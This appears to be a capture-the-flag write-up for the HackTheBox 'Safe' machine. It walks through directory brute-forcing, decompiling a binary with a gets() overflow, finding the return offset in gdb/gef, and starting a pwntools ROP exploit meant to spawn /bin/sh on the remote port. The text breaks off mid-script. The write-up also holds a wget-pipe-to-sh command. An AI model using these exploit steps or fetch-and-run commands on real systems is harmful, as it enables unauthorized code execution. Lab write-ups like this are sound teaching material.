+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → dirsearch -u http://10.10.10.147/ -e php,html,txt,js
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php, html, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 7126
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-02-16_08-32-43.log
+
+ Target: http://10.10.10.147/
+
+ [08:32:44] Starting:
+ [08:32:46] 403 - 298B - /.ht_wsr.txt
+ [08:32:46] 403 - 291B - /.hta
+ [08:32:46] 403 - 300B - /.htaccess-dev
+ [08:32:46] 403 - 302B - /.htaccess-local
+ [08:32:46] 403 - 302B - /.htaccess-marco
+ [08:32:46] 403 - 300B - /.htaccess.BAK
+ [08:32:46] 403 - 301B - /.htaccess.bak1
+ [08:32:46] 403 - 301B - /.htaccess.orig
+ [08:32:46] 403 - 300B - /.htaccess.old
+ [08:32:46] 403 - 303B - /.htaccess.sample
+ [08:32:46] 403 - 301B - /.htaccess.save
+ [08:32:46] 403 - 300B - /.htaccess.txt
+ [08:32:46] 403 - 302B - /.htaccess_extra
+ [08:32:46] 403 - 301B - /.htaccess_orig
+ [08:32:46] 403 - 299B - /.htaccess_sc
+ [08:32:46] 403 - 299B - /.htaccessBAK
+ [08:32:46] 403 - 300B - /.htaccessOLD2
+ [08:32:46] 403 - 299B - /.htaccessOLD
+ [08:32:46] 403 - 295B - /.htgroup
+ [08:32:46] 403 - 297B - /.htaccess~
+ [08:32:47] 403 - 300B - /.htpasswd-old
+ [08:32:47] 403 - 301B - /.htpasswd_test
+ [08:32:47] 403 - 297B - /.htpasswds
+ [08:32:47] 403 - 295B - /.htusers
+ [08:33:29] 200 - 11KB - /index.md
+ [08:33:34] 200 - 626B - /manual/index.md
+ [08:33:34] 301 - 313B - /manual -> http://10.10.10.147/manual/
+ [08:33:47] 403 - 300B - /server-status
+ [08:33:47] 403 - 301B - /server-status/
+
+ Task Completed
+
+
+Looking at the sourcecode of http://10.10.10.147 we see something commented out mentionning a binary named "myapp" running on port 1337.
+
+
+
+Let's first download the binary locally, at http://10.10.10.147/myapp
+
+
+
+Let's navigate to http://10.10.10.147:1337 to see it running.
+
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → ls
+ myapp
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → file myapp
+ myapp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fcbd5450d23673e92c8b716200762ca7d282c73a, not stripped
+
+
+Looks like we are looking at a Return Oriented Programming (ROP) binary challenge, which is a Buffer Overflow based challenge. let's fire up gdb on myapp to see what we can do with it.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → chmod +x myapp
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Safe]
+ → gdb ./myapp
+ GNU gdb (Debian 8.3.1-1) 8.3.1
+ Copyright (C) 2019 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ Reading symbols from ./myapp...
+ (No debugging symbols found in ./myapp)
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10840]
+ 08:58:30 up 15:20, 1 user, load average: 0.93, 0.87, 0.79
+
+ What do you want me to echo back? A
+ A
+ [Inferior 1 (process 10836) exited normally]
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10843]
+ 08:58:42 up 15:20, 1 user, load average: 0.86, 0.85, 0.78
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ [Inferior 1 (process 10842) exited normally]
+ (gdb) r
+ Starting program: /home/nihilist/_HTB/Safe/myapp
+ [Detaching after vfork from child process 10849]
+ 08:59:03 up 15:20, 1 user, load average: 0.61, 0.80, 0.77
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+
+
+Basically we need 500 As to crash the program. let's see if it still crashes if we create a pattern. While we can continue in gdb-peda, for this example we'll proceed in Ghidra to illustrate what the binary does.
+
+
+ >unzip ghidra into /opt
+ >sudo /opt/ghidra_9.1.1_PUBLIC/ghidraRun
+ >Create project in /home/nihilist/_HTB/Safe/Ghidra/
+ >project name myapp > finish
+
+ >File > Import file > myapp
+ >analyze it
+ >select all
+ >analyze
+
+ >symbol tree
+ >functions
+ >main
+
+
+
+
+
+
+ undefined8 main(void)
+
+ {
+ char local_78 [112];
+
+ system("/usr/bin/uptime");
+ printf("\nWhat do you want me to echo back? ");
+ gets(local_78);
+ puts(local_78);
+ return 0;
+ }
+
+
+our main function here assigns a variable 112 bytes, which then executes system passing /usr/bin/uptime as that call, That is why we can see it run on port 1337, running uptime in our terminal shows up the same thing. Once it is done running the uptime binary, it does a **gets()** and a **puts()**
+
+From here we can see that if we put in more than 112 bytes, we will end up overflowing the buffer and getting overwrites
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → gdb -q myapp
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 76 commands loaded for GDB 8.3.1 using Python engine 3.7
+ [*] 4 commands could not be loaded, run `gef missing` to know why.
+ Reading symbols from myapp...
+ (No debugging symbols found in myapp)
+ gef➤ r
+
+
+back into gdb, we need gef's additional options to create patterns to identify what we can do with the buffer overflow.
+
+
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 13738]
+ 09:45:31 up 16:07, 1 user, load average: 1.14, 1.08, 1.10
+
+ What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "AAAAAAAA"
+ $rbp : 0x4141414141414141 ("AAAAAAAA"?)
+ $rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0x81
+ $r9 : 0x4141414141414141 ("AAAAAAAA"?)
+ $r10 : 0x4141414141414141 ("AAAAAAAA"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe438│+0x0000: "AAAAAAAA" ← $rsp
+ 0x00007fffffffe440│+0x0008: 0x0000000000000000
+ 0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp"
+ 0x00007fffffffe450│+0x0018: 0x0000000100400000
+ 0x00007fffffffe458│+0x0020: 0x000000000040115f → <****main+0> push rbp
+ 0x00007fffffffe460│+0x0028: 0x0000000000000000
+ 0x00007fffffffe468│+0x0030: 0xad7b338534175b70
+ 0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4011a1 <****main+66> call 0x401030 <****puts@plt>
+ 0x4011a6 <****main+71> mov eax, 0x0
+ 0x4011ab <****main+76> leave
+ → 0x4011ac <****main+77> ret
+ [!] Cannot disassemble from $PC
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGSEGV
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4011ac → main()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+From there, we can see that putting in more than 112 bytes (in this example, 128 bytes) we are able to cause a segfault, However we need to see where exactly we crash. So we create a pattern, paste it in, and see where exactly do we crash
+
+
+ gef➤ pattern create 200
+ [+] Generating a pattern of 200 bytes
+ aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+ [+] Saved as '$_gef0'
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 13856]
+ 09:49:26 up 16:11, 1 user, load average: 1.01, 0.98, 1.05
+
+ What do you want me to echo back? aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+ aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00000000004011ac in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
+ $rbp : 0x616161616161616f ("oaaaaaaa"?)
+ $rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0xc9
+ $r9 : 0x6161616161616176 ("vaaaaaaa"?)
+ $r10 : 0x6161616161616177 ("waaaaaaa"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe438│+0x0000: "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]" ← $rsp
+ 0x00007fffffffe440│+0x0008: "qaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawa[...]"
+ 0x00007fffffffe448│+0x0010: "raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[...]"
+ 0x00007fffffffe450│+0x0018: "saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[...]"
+ 0x00007fffffffe458│+0x0020: "taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe460│+0x0028: "uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe468│+0x0030: "vaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
+ 0x00007fffffffe470│+0x0038: "waaaaaaaxaaaaaaayaaaaaaa"
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4011a1 <****main+66> call 0x401030 <****puts@plt>
+ 0x4011a6 <****main+71> mov eax, 0x0
+ 0x4011ab <****main+76> leave
+ → 0x4011ac <****main+77> ret
+ [!] Cannot disassemble from $PC
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGSEGV
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4011ac → main()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+In order to be more precise, let's use the registers function to see the details of our buffer overflow
+
+
+ gef➤ registers
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
+ $rbp : 0x616161616161616f ("oaaaaaaa"?)
+ $rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0xc9
+ $r9 : 0x6161616161616176 ("vaaaaaaa"?)
+ $r10 : 0x6161616161616177 ("waaaaaaa"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+
+ gef➤ pattern search $rsp
+ [+] Searching '$rsp'
+ [+] Found at offset 120 (little-endian search) likely
+ [+] Found at offset 113 (big-endian search)
+
+
+Looks like we have found our pattern at offset 120 (little-endian format) and at offset 113 (big-endian format) Let's hand-craft a pattern of 120 Xs, 8 Ys and 8 Zs
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → python -c 'print "X"*128 + "Y"*8 + "Z"*8'
+ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+
+
+and paste it in the binary to examine the registers
+
+
+ gef➤ r
+ Starting program: /home/nihilist/_HTB/Safe/Ghidra/myapp
+ [Detaching after vfork from child process 14017]
+ 09:56:05 up 16:17, 1 user, load average: 1.69, 1.21, 1.09
+
+ What do you want me to echo back? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+ XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXYYYYYYYYZZZZZZZZ
+
+ gef➤ registers
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
+ $rdx : 0x00007ffff7fad580 → 0x0000000000000000
+ $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ"
+ $rbp : 0x5858585858585858 ("XXXXXXXX"?)
+ $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]"
+ $rdi : 0x0
+ $rip : 0x00000000004011ac → <****main+77> ret
+ $r8 : 0x91
+ $r9 : 0x5858585858585858 ("XXXXXXXX"?)
+ $r10 : 0x5858585858585858 ("XXXXXXXX"?)
+ $r11 : 0x246
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fffffffe510 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ gef➤
+
+
+So, if we can put a memory address where the Xs are, we can continue with the execution of the program. For example we can put the memory address of main so let's take a look back at ghidra, to see what the memory address of main is.
+
+
+
+Now we know that the main function is at the 0x40115f memory address. From there we can create a python script to interact with it a little further.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → nano exploit.py
+
+
+
+ #0x40115f - main
+ from pwn import *
+ context(terminal=['tmux','new-window'])
+ p = gdb.debug('./myapp','b main')
+ context(os='linux',arch='amd64')
+
+ junk = ("A" * 120).encode()
+ call_main = p64(0x40115f)
+
+ p.recvuntil('What do you want me to echo back ?')
+ p.sendline(j + call_main)
+
+
+
+ python3 exploit.py
+
+
+
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x0
+ $rcx : 0x0
+ $rdx : 0x0
+ $rsp : 0x00007fff98990520 → 0x0000000000000001
+ $rbp : 0x0
+ $rsi : 0x0
+ $rdi : 0x0
+ $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp
+ $r8 : 0x0
+ $r9 : 0x0
+ $r10 : 0x0
+ $r11 : 0x0
+ $r12 : 0x0
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fff98990520│+0x0000: 0x0000000000000001 ← $rsp
+ 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ 0x00007fff98990530│+0x0010: 0x0000000000000000
+ 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
+ 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm"
+ 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor"
+ 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0"
+ 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root"
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x7fd2a202e08a add BYTE PTR [rax], al
+ 0x7fd2a202e08c add BYTE PTR [rax], al
+ 0x7fd2a202e08e add BYTE PTR [rax], al
+ → 0x7fd2a202e090 <_start+0> mov rdi, rsp
+ 0x7fd2a202e093 <_start+3> call 0x7fd2a202ee80 <_dl_start>
+ 0x7fd2a202e098 <_dl_start_user+0> mov r12, rax
+ 0x7fd2a202e09b <_dl_start_user+3> mov eax, DWORD PTR [rip+0x27597] # 0x7fd2a2055638 <_dl_skip_args>
+ 0x7fd2a202e0a1 <_dl_start_user+9> pop rdx
+ 0x7fd2a202e0a2 <_dl_start_user+10> lea rsp, [rsp+rax*8]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: SIGTRAP
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x7fd2a202e090 → _start()
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ Reading /lib64/ld-linux-x86-64.so.2 from remote target...
+ Breakpoint 1 at 0x401163
+
+
+So here we hit our first breakpoint which is main, we do continue with the c command
+
+
+ gef➤ c
+ Continuing.
+ Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target...
+
+ Breakpoint 1, 0x0000000000401163 in main ()
+ __main__:2421: DeprecationWarning: invalid escape sequence '\'
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x000000000040115f → <****main+0> push rbp
+ $rbx : 0x0
+ $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000
+ $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
+ $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
+ $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ $rdi : 0x1
+ $rip : 0x0000000000401163 → <****main+4> sub rsp, 0x70
+ $r8 : 0x00007fd2a2009a50 → 0x0000000000000004
+ $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp
+ $r10 : 0xffffffff
+ $r11 : 0x4
+ $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
+ $r13 : 0x00007fff98990520 → 0x0000000000000001
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp
+ 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax
+ 0x00007fff98990450│+0x0010: 0x0000000000000000
+ 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
+ 0x00007fff98990460│+0x0020: 0x0000000100400000
+ 0x00007fff98990468│+0x0028: 0x000000000040115f → <****main+0> push rbp
+ 0x00007fff98990470│+0x0030: 0x0000000000000000
+ 0x00007fff98990478│+0x0038: 0xe451416c2c196dfa
+ ───────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x40115e <****test+12> ret
+ 0x40115f <****main+0> push rbp
+ 0x401160 <****main+1> mov rbp, rsp
+ → 0x401163 <****main+4> sub rsp, 0x70
+ 0x401167 <****main+8> lea rdi, [rip+0xe9a] # 0x402008
+ 0x40116e <****main+15> call 0x401040 <****system@plt>
+ 0x401173 <****main+20> lea rdi, [rip+0xe9e] # 0x402018
+ 0x40117a <****main+27> mov eax, 0x0
+ 0x40117f <****main+32> call 0x401050 <****printf@plt>
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "myapp", stopped, reason: BREAKPOINT
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x401163 → main()
+
+Here we hit another breakpoint on main. To see what we can do let's return to ghidra, we want to somehow hijack the systemcall in our main function even though we don't have a way to put something on the stack.
+
+
+ undefined8 main(void)
+
+ {
+ char local_78 [112];
+
+ system("/usr/bin/uptime");
+ printf("\nWhat do you want me to echo back? ");
+ gets(local_78);
+ puts(local_78);
+ return 0;
+ }
+
+
+in ghidra still, we check what is the system()'s memory address
+
+
+
+Now that we know system()'s memory address, we can run our exploit.py again accordingly back into gef
+
+
+ Breakpoint 1 at 0x401163
+ gef➤ b *0x40116e
+ Breakpoint 2 at 0x40116e
+ gef➤ c
+
+
+now that we set our second breakpoint at the system call's memory address, we can continue, but the execution will halt where we want.
+
+
+ 0x40115e <****test+12> ret
+ 0x40115f <****main+0> push rbp
+ 0x401160 <****main+1> mov rbp, rsp
+ → 0x401163 <****main+4> sub rsp, 0x70
+ 0x401167 <****main+8> lea rdi, [rip+0xe9a] # 0x402008
+ 0x40116e <****main+15> call 0x401040 <****system@plt>
+ 0x401173 <****main+20> lea rdi, [rip+0xe9e] # 0x402018
+ 0x40117a <****main+27> mov eax, 0x0
+ 0x40117f <****main+32> call 0x401050 <****printf@plt>
+
+we halted 2 lines before the systemcall. First we are loading the first variable into rdi which is "/usr/bin/uptime" we can verify it with the following :
+
+
+ gef➤ x/s $rdi
+ 0x1: <****error: Cannot access memory at address 0x1>
+
+ gef➤ c
+
+ gef➤ x/s $rdi
+ 0x402008: "/usr/bin/uptime"
+
+doing so we can see the variable "/usr/bin/uptime" getting loaded into rdi, we can verify it using the registers command. From there Our goal is to find a way to put our string into $rdi, so that instead of calling uptime, the system will call something else. we change our exploit.py accordingly, adding the ropchain
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → objdump -D myapp | grep -i system
+ 0000000000401040 <****system@plt>:
+ 401040: ff 25 da 2f 00 00 jmpq *0x2fda(%rip) # 404020 <****system@GLIBC_2.2.5>
+ 40116e: e8 cd fe ff ff callq 401040 <****system@plt>
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → objdump -D myapp | grep -i test
+ 40100b: 48 85 c0 test %rax,%rax
+ 4010c2: 48 85 c0 test %rax,%rax
+ 401104: 48 85 c0 test %rax,%rax
+ 0000000000401152 :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → nano exploit.py
+
+
+So we need the jump instruction here, at the memory address 0x401040 and the test function's memory address 0x401152 to modify our python script accordingly
+
+
+ #0x40115f - main
+ #0x40116e - system
+ #0x401206 - pop r13, pop, pop
+
+ from pwn import *
+ context(terminal=['tmux','new-window'])
+ #p = gdb.debug('./myapp','b main')
+ p = remote('10.10.10.147', 1337)
+ context(os='linux',arch='amd64')
+
+
+ junk = ("A" * 112).encode()
+ bin_sh = "/bin/sh\x00".encode()
